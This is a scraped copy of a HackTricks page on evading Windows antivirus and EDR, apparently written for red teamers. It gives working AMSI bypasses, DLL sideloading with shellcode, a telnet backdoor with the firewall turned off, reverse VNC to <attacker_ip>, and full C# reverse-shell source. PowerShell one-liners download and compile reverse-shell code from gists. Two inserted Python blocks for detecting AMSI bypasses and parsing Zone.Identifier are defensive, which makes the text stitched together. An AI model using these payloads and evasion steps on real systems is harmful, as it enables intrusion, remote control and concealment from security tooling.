Source: https://book.hacktricks.xyz/windows-hardening/av-bypass
urlscan.io public scan, submitted on December 06 via API from NL.
ANTIVIRUS (AV) BYPASS

This page was written by @m2rc_p!

AV EVASION METHODOLOGY

Currently, AVs use different methods to check whether a file is malicious: static detection, dynamic analysis and, for the more advanced EDRs, behavioural analysis.

STATIC DETECTION

Static detection is achieved by flagging known malicious strings or arrays of bytes in a binary or script, and also by extracting information from the file itself (e.g. file description, company name, digital signatures, icon, checksum, etc.). This means that using known public tools may get you caught more easily, as they have probably been analyzed and flagged as malicious. There are a couple of ways of getting around this sort of detection:

* Encryption: if you encrypt the binary, the AV has no way of detecting your program, but you will need some sort of loader to decrypt and run the program in memory.
* Obfuscation: sometimes all you need to do is change some strings in your binary or script to get it past the AV, but this can be a time-consuming task depending on what you are trying to obfuscate.
* Custom tooling: if you develop your own tools, there will be no known bad signatures, but this takes a lot of time and effort.

A good way of checking against Windows Defender's static detection is ThreatCheck. It basically splits the file into multiple segments and then tasks Defender with scanning each one individually; this way, it can tell you exactly which strings or bytes in your binary are flagged.

I highly recommend you check out this YouTube playlist about practical AV Evasion.

DYNAMIC ANALYSIS

Dynamic analysis is when the AV runs your binary in a sandbox and watches for malicious activity (e.g. trying to decrypt and read your browser's passwords, performing a minidump on LSASS, etc.). This part can be a bit trickier to work with, but here are some things you can do to evade sandboxes.

* Sleep before execution: depending on how it is implemented, this can be a great way of bypassing the AV's dynamic analysis. AVs have a very short time to scan files so as not to interrupt the user's workflow, so long sleeps can disturb the analysis of binaries. The problem is that many AV sandboxes can simply skip the sleep, depending on how it is implemented.
* Checking the machine's resources: usually sandboxes have very few resources to work with (e.g. < 2GB RAM), otherwise they could slow down the user's machine. You can also get very creative here, for example by checking the CPU's temperature or even the fan speeds; not everything will be implemented in the sandbox.
* Machine-specific checks: if you want to target a user whose workstation is joined to the "contoso.local" domain, you can check the computer's domain to see if it matches the one you have specified; if it doesn't, you can make your program exit.

It turns out that Microsoft Defender's sandbox computer name is HAL9TH, so you can check for the computer name in your malware before detonation: if the name matches HAL9TH, you are inside Defender's sandbox, so you can make your program exit.

source: https://youtu.be/StSLxFbVz0M?t=1439

Some other really good tips from @mgeeky for going against sandboxes (Red Team VX Discord, #malware-dev channel).

As we've said before in this post, public tools will eventually get detected, so you should ask yourself something: for example, if you want to dump LSASS, do you really need to use mimikatz? Or could you use a different project which is less well known and also dumps LSASS? The right answer is probably the latter.

Taking mimikatz as an example, it's probably one of, if not the most flagged piece of malware by AVs and EDRs. While the project itself is super cool, it's also a nightmare to work with to get around AVs, so just look for alternatives for what you're trying to achieve.

When modifying your payloads for evasion, make sure to turn off automatic sample submission in Defender, and please, seriously, DO NOT UPLOAD TO VIRUSTOTAL if your goal is achieving evasion in the long run. If you want to check whether your payload gets detected by a particular AV, install it on a VM, try to turn off automatic sample submission, and test it there until you're satisfied with the result.
EXES VS DLLS

Whenever possible, always prioritize using DLLs for evasion. In my experience, DLL files are usually way less detected and analyzed, so it's a very simple trick to use in order to avoid detection in some cases (if your payload has some way of running as a DLL, of course).

As we can see in this image, a DLL payload from Havoc has a detection rate of 4/26 on antiscan.me, while the EXE payload has a 7/26 detection rate.

[Image: antiscan.me comparison of a normal Havoc EXE payload vs a normal Havoc DLL]

Now we'll show some tricks you can use with DLL files to be much stealthier.

DLL SIDELOADING & PROXYING

DLL sideloading takes advantage of the DLL search order used by the loader by positioning both the victim application and the malicious payload(s) alongside each other.

You can check for programs susceptible to DLL sideloading using Siofra and the following PowerShell script:

```powershell
# Walk every .exe under "C:\Program Files\" and ask Siofra which of the DLLs it
# loads could be hijacked. The Siofra64.exe path is the author's; adjust it to your setup.
Get-ChildItem -Path "C:\Program Files\" -Filter *.exe -Recurse -File -Name | ForEach-Object {
    $binarytoCheck = "C:\Program Files\" + $_
    C:\Users\user\Desktop\Siofra64.exe --mode file-scan --enum-dependency --dll-hijack -f $binarytoCheck
}
```

This command will output the list of programs susceptible to DLL hijacking inside "C:\Program Files\" and the DLL files they try to load.

I highly recommend you explore DLL hijackable/sideloadable programs yourself; this technique is pretty stealthy when done properly, but if you use publicly known DLL sideloadable programs, you may get caught easily.

Just placing a malicious DLL with the name a program expects to load won't load your payload, as the program expects some specific functions inside that DLL. To fix this issue, we'll use another technique called DLL proxying/forwarding.

DLL proxying forwards the calls a program makes from the proxy (and malicious) DLL to the original DLL, thus preserving the program's functionality while being able to handle the execution of your payload.
I will be using the SharpDLLProxy project from @flangvik.

These are the steps I followed:

1. Find an application vulnerable to DLL sideloading (Siofra or using Process Hacker)
2. Generate some shellcode (I used Havoc C2)
3. (Optional) Encode your shellcode using Shikata Ga Nai (https://github.com/EgeBalci/sgn)
4. Use SharpDLLProxy to create the proxy DLL: `.\SharpDllProxy.exe --dll .\mimeTools.dll --payload .\demon.bin`

The last command will give us 2 files: a DLL source code template, and the original renamed DLL.

5. Create a new Visual Studio project (C++ DLL), paste the code generated by SharpDLLProxy (under output_dllname/dllname_pragma.c) and compile.

Now you should have a proxy DLL which will load the shellcode you've specified and also forward any calls to the original DLL.

These are the results:

Both our shellcode (encoded with SGN) and the proxy DLL have a 0/26 detection rate on antiscan.me! I would call that a success.

I highly recommend you watch S3cur3Th1sSh1t's Twitch VOD about DLL sideloading and also ippsec's video to learn about what we've discussed in more depth.

FREEZE

Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative execution methods.

You can use Freeze to load and execute your shellcode in a stealthy manner.

Git clone the Freeze repo and build it:

```shell
git clone https://github.com/optiv/Freeze.git && cd Freeze && go build Freeze.go
```

1. Generate some shellcode; in this case I used Havoc C2.
2. `./Freeze -I demon.bin -encrypt -O demon.exe`
3. Profit, no alerts from Defender

Evasion is just a cat & mouse game: what works today could be detected tomorrow, so never rely on only one tool; if possible, try chaining multiple evasion techniques.

AMSI (ANTI-MALWARE SCAN INTERFACE)

AMSI was created to prevent "fileless malware".
Initially, AVs were only capable of scanning files on disk, so if you could somehow execute payloads directly in memory, the AV couldn't do anything to prevent it, as it didn't have enough visibility.

The AMSI feature is integrated into these components of Windows:

* User Account Control, or UAC (elevation of EXE, COM, MSI, or ActiveX installation)
* PowerShell (scripts, interactive use, and dynamic code evaluation)
* Windows Script Host (wscript.exe and cscript.exe)
* JavaScript and VBScript
* Office VBA macros

It allows antivirus solutions to inspect script behavior by exposing script contents in a form that is both unencrypted and unobfuscated.

Running `IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')` will produce the following alert on Windows Defender.

Notice how it prepends `amsi:` and then the path to the executable from which the script ran, in this case powershell.exe.

We didn't drop any file to disk, but still got caught in memory because of AMSI.

There are a couple of ways to get around AMSI:

* Obfuscation

Since AMSI mainly works with static detections, modifying the scripts you try to load can be a good way of evading detection.

However, AMSI has the capability of unobfuscating scripts even if they have multiple layers, so obfuscation could be a bad option depending on how it's done. This makes it not so straightforward to evade. Although, sometimes, all you need to do is change a couple of variable names and you'll be good, so it depends on how much something has been flagged.

* AMSI Bypass

Since AMSI is implemented by loading a DLL into the PowerShell (also cscript.exe, wscript.exe, etc.) process, it's possible to tamper with it easily even when running as an unprivileged user. Due to this flaw in the implementation of AMSI, researchers have found multiple ways to evade AMSI scanning.
### Forcing an Error

Forcing the AMSI initialization to fail (amsiInitFailed) will result in no scan being initiated for the current process. Originally this was disclosed by Matt Graeber, and Microsoft has developed a signature to prevent wider usage.

```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```

All it took was one line of PowerShell code to render AMSI unusable for the current PowerShell process. This line has of course been flagged by AMSI itself, so some modification is needed in order to use this technique.

Here is a modified AMSI bypass I took from this GitHub Gist.

```powershell
Try{#Ams1 bypass technic nº 2
$Xdatabase = 'Utils';$Homedrive = 'si'
$ComponentDeviceId = "N`onP" + "ubl`ic" -join ''
$DiskMgr = 'Syst+@.M£n£g' + 'e@+nt.Auto@' + '£tion.A' -join ''
$fdx = '@ms' + '£In£' + 'tF@£' + 'l+d' -Join '';Start-Sleep -Milliseconds 300
$CleanUp = $DiskMgr.Replace('@','m').Replace('£','a').Replace('+','e')
$Rawdata = $fdx.Replace('@','a').Replace('£','i').Replace('+','e')
$SDcleanup = [Ref].Assembly.GetType(('{0}m{1}{2}' -f $CleanUp,$Homedrive,$Xdatabase))
$Spotfix = $SDcleanup.GetField($Rawdata,"$ComponentDeviceId,Static")
$Spotfix.SetValue($null,$true)
}Catch{Throw $_}
```

Keep in mind that this will probably get flagged once this post comes out, so you should not publish any code if your plan is to stay undetected.

### Memory Patching

This technique was initially discovered by @RastaMouse and involves finding the address of the "AmsiScanBuffer" function in amsi.dll (responsible for scanning the user-supplied input) and overwriting it with instructions to return the code for E_INVALIDARG; this way, the result of the actual scan will return 0, which is interpreted as a clean result.

Please read https://rastamouse.me/memory-patching-amsi-bypass/ for a more detailed explanation.
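The obfuscated variant above only hides the strings AmsiUtils and amsiInitFailed behind backtick escapes, `+` concatenation, constant `.Replace()` chains, `-f` formatting and variables bound to literals; the reflection call shape is unchanged. As an added defender-side example (not code from the page or the Gist), the detector below folds those tricks in script block text, such as the ScriptBlockText of PowerShell event 4104, and then looks for the telltale names, falling back to the reflection-plus-SetValue shape when folding falls short. The indicator list and the samples in the test are assumptions.

```python
"""Fold the cheap string-building tricks used by published AMSI bypasses
(backtick escapes, 'a' + 'b' joins, constant .Replace() chains, -f formatting,
variables bound to literals) and look for the telltale names afterwards.
Added example, not from the page; input is a script body such as the
ScriptBlockText of PowerShell event 4104. Literals are tokenized left to right,
so an unbalanced quote in a comment would confuse the folding (fine for triage)."""
import re

INDICATORS = ("amsiutils", "amsiinitfailed", "amsiscanbuffer", "amsi.dll")
LIT = re.compile(r"('[^']*'|\"[^\"]*\")")        # PowerShell string literals
STRUCTURAL = (r"\[ref\]\.assembly\.gettype", r"\.getfield\(",
              r"\.setvalue\(\$null\s*,\s*\$true\)")


def _fold(parts: list) -> str:
    """parts alternates text/literal (from LIT.split). Merge 'a' + 'b', apply
    constant .Replace('x','y') chains and 'fmt' -f 'a','b' onto literals."""
    out, i = [parts[0]], 1
    while i < len(parts):
        lit = parts[i][1:-1]
        while i + 2 < len(parts):
            nxt = parts[i + 1]
            if re.fullmatch(r"\s*\+\s*", nxt):                     # 'a' + 'b'
                lit += parts[i + 2][1:-1]
                i += 2
            elif (re.fullmatch(r"\.replace\(\s*", nxt, re.I) and i + 5 < len(parts)
                  and re.fullmatch(r"\s*,\s*", parts[i + 3])
                  and parts[i + 5].startswith(")")):               # 'a'.Replace('x','y')
                lit = lit.replace(parts[i + 2][1:-1], parts[i + 4][1:-1])
                parts[i + 5] = parts[i + 5][1:]
                i += 4
            elif re.fullmatch(r"\s*-f\s*", nxt, re.I):              # '{0}{1}' -f 'a','b'
                args, i = [parts[i + 2][1:-1]], i + 2
                while i + 2 < len(parts) and re.fullmatch(r"\s*,\s*", parts[i + 1]):
                    args.append(parts[i + 2][1:-1])
                    i += 2
                lit = re.sub(r"\{(\d+)\}", lambda m: args[int(m.group(1))]
                             if int(m.group(1)) < len(args) else m.group(0), lit)
            else:
                break
        out += ["'" + lit + "'", parts[i + 1] if i + 1 < len(parts) else ""]
        i += 2
    return "".join(out)


def normalize(script: str) -> str:
    s = script.replace("`", "")                          # "N`onP" -> "NonP"
    s = re.sub(r"\s*-join\s*''", "", s, flags=re.I)      # no-op on a plain string
    for _ in range(8):                                   # fold, bind literal vars, repeat
        new = _fold(LIT.split(s))
        for name, val in re.findall(r"\$(\w+)\s*=\s*'([^']*)'", new):
            new = re.sub(r"\$" + re.escape(name) + r"\b",
                         lambda m, v=val: "'" + v + "'", new)
        if new == s:
            break
        s = new
    return s.lower()


def amsi_indicators(script: str) -> list:
    """Indicator names found after folding (empty list = nothing seen)."""
    text = normalize(script)
    hits = [w for w in INDICATORS if w in text]
    # Reflection into a private static field followed by SetValue($null,$true)
    # is the amsiInitFailed pattern itself, even when the folding falls short.
    if all(re.search(p, text) for p in STRUCTURAL):
        hits.append("reflection-setvalue-pattern")
    return hits
```

Run against the Gist above, `normalize` recovers `System.Management.Automation.AmsiUtils` and `amsiInitFailed`, so both the string indicators and the structural pattern fire.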
There are also many other techniques used to bypass AMSI with PowerShell; check out this page and this repo to learn more about them.

Or this script that via memory patching will patch each new Powersh

## Obfuscation

There are several tools that can be used to obfuscate C# clear-text code, generate metaprogramming templates to compile binaries or obfuscate compiled binaries, such as:

* InvisibilityCloak: C# obfuscator
* Obfuscator-LLVM: The aim of this project is to provide an open-source fork of the LLVM compilation suite able to provide increased software security through code obfuscation and tamper-proofing.
* ADVobfuscator: ADVobfuscator demonstrates how to use the C++11/14 language to generate, at compile time, obfuscated code without using any external tool and without modifying the compiler.
* obfy: Add a layer of obfuscated operations generated by the C++ template metaprogramming framework which will make the life of the person wanting to crack the application a little bit harder.
* Alcatraz: Alcatraz is an x64 binary obfuscator that is able to obfuscate various different PE files including: .exe, .dll, .sys
* metame: Metame is a simple metamorphic code engine for arbitrary executables.
* ropfuscator: ROPfuscator is a fine-grained code obfuscation framework for LLVM-supported languages using ROP (return-oriented programming). ROPfuscator obfuscates a program at the assembly code level by transforming regular instructions into ROP chains, thwarting our natural conception of normal control flow.
* Nimcrypt: Nimcrypt is a .NET PE Crypter written in Nim
* inceptor: Inceptor is able to convert existing EXE/DLL into shellcode and then load them

## SmartScreen & MoTW

You may have seen this screen when downloading some executables from the internet and executing them.

Microsoft Defender SmartScreen is a security mechanism intended to protect the end user against running potentially malicious applications.
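SmartScreen's decision hinges on the Zone.Identifier alternate data stream (the Mark of the Web) described below. As an added defender-side example, not code from the page or from PackMyPayload, here is a parser for that stream and a reader that checks a file for it; the zone-name table follows the URLZONE values and the stream text in the test is constructed.

```python
"""Parse the Zone.Identifier alternate data stream that carries the Mark of the
Web and read it from a file on an NTFS volume. Added example, not from the page
or from PackMyPayload; the stream text used in the test is constructed."""
import configparser
from typing import Optional

# URLZONE values Windows writes into ZoneId.
ZONES = {0: "My Computer", 1: "Local intranet", 2: "Trusted sites",
         3: "Internet", 4: "Restricted sites"}


def parse_zone_identifier(stream_text: str) -> Optional[dict]:
    """Return zone id/name and the recorded URLs, or None when the text is not
    a [ZoneTransfer] block with a numeric ZoneId."""
    cp = configparser.ConfigParser(interpolation=None)   # URLs may contain '%'
    cp.optionxform = str                                 # keep ZoneId/HostUrl case
    try:
        cp.read_string(stream_text)
    except configparser.Error:
        return None
    if not cp.has_option("ZoneTransfer", "ZoneId"):
        return None
    sec = cp["ZoneTransfer"]
    try:
        zone_id = int(sec["ZoneId"])
    except ValueError:
        return None
    return {"zone_id": zone_id, "zone": ZONES.get(zone_id, "unknown"),
            "referrer_url": sec.get("ReferrerUrl"), "host_url": sec.get("HostUrl")}


def read_motw(path: str) -> Optional[dict]:
    """Open <path>:Zone.Identifier (Windows/NTFS). None means no stream: the
    file was never downloaded, the stream was stripped, or the file came out
    of a container on a non-NTFS volume such as a mounted ISO (see the text)."""
    try:
        with open(path + ":Zone.Identifier", encoding="utf-8", errors="replace") as fh:
            return parse_zone_identifier(fh.read())
    except OSError:
        return None


def from_internet(info: Optional[dict]) -> bool:
    """SmartScreen-relevant test: ZoneId 3 (Internet) or 4 (Restricted sites)."""
    return info is not None and info["zone_id"] >= 3
```

On a Windows host, `read_motw(r"C:\Users\user\Downloads\app.exe")` returns the parsed stream for a browser download and None for the same binary copied out of a mounted ISO.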
SmartScreen mainly works with a reputation-based approach, meaning that uncommonly downloaded applications will trigger SmartScreen, thus alerting and preventing the end user from executing the file (although the file can still be executed by clicking More Info -> Run anyway).

MoTW (Mark of The Web) is an NTFS Alternate Data Stream with the name Zone.Identifier, which is automatically created when downloading files from the internet, along with the URL the file was downloaded from.

*Checking the Zone.Identifier ADS for a file downloaded from the internet.*

It's important to note that executables signed with a trusted signing certificate won't trigger SmartScreen.

A very effective way to prevent your payloads from getting the Mark of The Web is by packaging them inside some sort of container like an ISO. This happens because Mark-of-the-Web (MOTW) cannot be applied to non-NTFS volumes.

PackMyPayload is a tool that packages payloads into output containers to evade Mark-of-the-Web.

Example usage:

```
PS C:\Tools\PackMyPayload> python .\PackMyPayload.py .\TotallyLegitApp.exe container.iso

    :: PACK MY PAYLOAD (1.1.0)
    for all your container cravings

    ~ Mariusz Banach / mgeeky
    ~ <mb [at] binary-offensive.com>

[.] Packaging input file to output .iso (iso)...
Burning file onto ISO:
    Adding file: /TotallyLegitApp.exe

[+] Generated file written to (size: 3420160): container.iso
```

Here is a demo for bypassing SmartScreen by packaging payloads inside ISO files using PackMyPayload.

## C# Assembly Reflection

Loading C# binaries in memory has been known for quite some time and it's still a very great way of running your post-exploitation tools without getting caught by AV.
Since the payload will get loaded directly into memory without touching disk, we will only have to worry about patching AMSI for the whole process.

Most C2 frameworks (Sliver, Covenant, Metasploit, Cobalt Strike, Havoc, etc.) already provide the ability to execute C# assemblies directly in memory, but there are different ways of doing so:

* Fork&Run

It involves spawning a new sacrificial process, injecting your post-exploitation malicious code into that new process, executing your malicious code and, when finished, killing the new process. This has both its benefits and its drawbacks. The benefit of the fork and run method is that execution occurs outside our Beacon implant process. This means that if something in our post-exploitation action goes wrong or gets caught, there is a much greater chance of our implant surviving. The drawback is that you have a greater chance of getting caught by behavioural detections.

* Inline

It's about injecting the post-exploitation malicious code into its own process. This way, you can avoid having to create a new process and getting it scanned by AV, but the drawback is that if something goes wrong with the execution of your payload, there's a much greater chance of losing your beacon as it could crash.

If you want to read more about C# Assembly loading, please check out this article https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/ and their InlineExecute-Assembly BOF (https://github.com/xforcered/InlineExecute-Assembly)

You can also load C# Assemblies from PowerShell; check out Invoke-SharpLoader and S3cur3th1sSh1t's video.

## Using Other Programming Languages

As proposed in https://github.com/deeexcee-io/LOI-Bins, it's possible to execute malicious code using other languages by giving the compromised machine access to the interpreter environment installed on the attacker-controlled SMB share.
By allowing access to the interpreter binaries and the environment on the SMB share you can execute arbitrary code in these languages within the memory of the compromised machine.

The repo indicates: "Defender still scans the scripts but by utilising Go, Java, PHP etc we have more flexibility to bypass static signatures. Testing with random un-obfuscated reverse shell scripts in these languages has proved successful."

## Advanced Evasion

Evasion is a very complicated topic; sometimes you have to take into account many different sources of telemetry in just one system, so it's pretty much impossible to stay completely undetected in mature environments.

Every environment you go against will have its own strengths and weaknesses.

I highly encourage you to go watch this talk from @ATTL4S to get a foothold into more advanced evasion techniques.

This is also another great talk from @mariuszbit about Evasion in Depth.

## Old Techniques

### Check which parts Defender finds as malicious

You can use ThreatCheck, which will remove parts of the binary until it finds out which part Defender is flagging as malicious and show it to you.
Another tool doing the same thing is avred, with an open web offering the service at https://avred.r00ted.ch/

### Telnet Server

Until Windows 10, all Windows versions came with a Telnet server that you could install (as administrator) doing:

```
pkgmgr /iu:"TelnetServer" /quiet
```

Make it start when the system is started and run it now:

```
sc config TlntSVR start= auto obj= localsystem
```

Change telnet port (stealth) and disable firewall:

```
tlntadmn config port=80
netsh advfirewall set allprofiles state off
```

### UltraVNC

Download it from: http://www.uvnc.com/downloads/ultravnc.html (you want the bin downloads, not the setup)

ON THE HOST: Execute winvnc.exe and configure the server:

* Enable the option Disable TrayIcon
* Set a password in VNC Password
* Set a password in View-Only Password

Then, move the binary winvnc.exe and the newly created file UltraVNC.ini inside the victim.

#### Reverse connection

The attacker should execute inside his host the binary `vncviewer.exe -listen 5900` so it will be prepared to catch a reverse VNC connection. Then, inside the victim: start the winvnc daemon `winvnc.exe -run` and run `winvnc.exe [-autoreconnect] -connect <attacker_ip>::5900`

WARNING: To maintain stealth you must not do a few things

* Don't start winvnc if it's already running or you'll trigger a popup. Check if it's running with `tasklist | findstr winvnc`
* Don't start winvnc without UltraVNC.ini in the same directory or it will cause the config window to open
* Don't run `winvnc -h` for help or you'll trigger a popup

### GreatSCT

Download it from: https://github.com/GreatSCT/GreatSCT

```
git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT/setup/
./setup.sh
cd ..
./GreatSCT.py
```

Inside GreatSCT:

```
use 1
list #Listing available payloads
use 9 #rev_tcp.py
set lhost 10.10.14.0
set lport 4444
generate #payload is the default name
#This will generate a meterpreter xml and a rcc file for msfconsole
```

Now start the listener with `msfconsole -r file.rc` and execute the xml payload with:

```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml
```

Current Defender will terminate the process very fast.

### Compiling our own reverse shell

https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15

#### First C# reverse shell

Compile it with:

```
c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt
```

Use it with:

```
back.exe <ATTACKER_IP> <PORT>
```

```csharp
// From https://gist.githubusercontent.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc/raw/1b6c32ef6322122a98a1912a794b48788edf6bad/Simple_Rev_Shell.cs
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;

namespace ConnectBack
{
    public class Program
    {
        static StreamWriter streamWriter;

        public static void Main(string[] args)
        {
            using(TcpClient client = new TcpClient(args[0], System.Convert.ToInt32(args[1])))
            {
                using(Stream stream = client.GetStream())
                {
                    using(StreamReader rdr = new StreamReader(stream))
                    {
                        streamWriter = new StreamWriter(stream);

                        StringBuilder strInput = new StringBuilder();

                        Process p = new Process();
                        p.StartInfo.FileName = "cmd.exe";
                        p.StartInfo.CreateNoWindow = true;
                        p.StartInfo.UseShellExecute = false;
                        p.StartInfo.RedirectStandardOutput = true;
                        p.StartInfo.RedirectStandardInput = true;
                        p.StartInfo.RedirectStandardError = true;
                        p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
                        p.Start();
                        p.BeginOutputReadLine();

                        while(true)
                        {
                            strInput.Append(rdr.ReadLine());
                            //strInput.Append("\n");
                            p.StandardInput.WriteLine(strInput);
                            strInput.Remove(0, strInput.Length);
                        }
                    }
                }
            }
        }

        private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
        {
            StringBuilder strOutput = new StringBuilder();

            if (!String.IsNullOrEmpty(outLine.Data))
            {
                try
                {
                    strOutput.Append(outLine.Data);
                    streamWriter.WriteLine(strOutput);
                    streamWriter.Flush();
                }
                catch (Exception err) { }
            }
        }
    }
}
```

#### C# using compiler

```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt.txt REV.shell.txt
```

REV.txt: https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066

REV.shell: https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639

Automatic download and execution:

```
64bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell

32bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
```

C# obfuscators list: https://github.com/NotPrab/.NET-Obfuscator

#### C++

```
sudo apt-get install mingw-w64

i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
```

* https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp
* https://astr0baby.wordpress.com/2013/10/17/customizing-custom-meterpreter-loader/
* https://www.blackhat.com/docs/us-16/materials/us-16-Mittal-AMSI-How-Windows-10-Plans-To-Stop-Script-Based-Attacks-And-How-Well-It-Does-It.pdf
* https://github.com/l0ss/Grouper2
* http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html
* http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/

#### Using Python to build injectors, example:

* https://github.com/cocomelonc/peekaboo

### Other tools

```
# Veil Framework:
https://github.com/Veil-Framework/Veil

# Shellter
https://www.shellterproject.com/download/

# Sharpshooter
# https://github.com/mdsecactivebreach/SharpShooter
# Javascript Payload Stageless:
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3

# Stageless HTA Payload:
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee

# Staged VBS:
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4

# Donut:
https://github.com/TheWover/donut

# Vulcan
https://github.com/praetorian-code/vulcan
```

### More

* https://github.com/persianhydra/Xeexe-TopAntivirusEvasion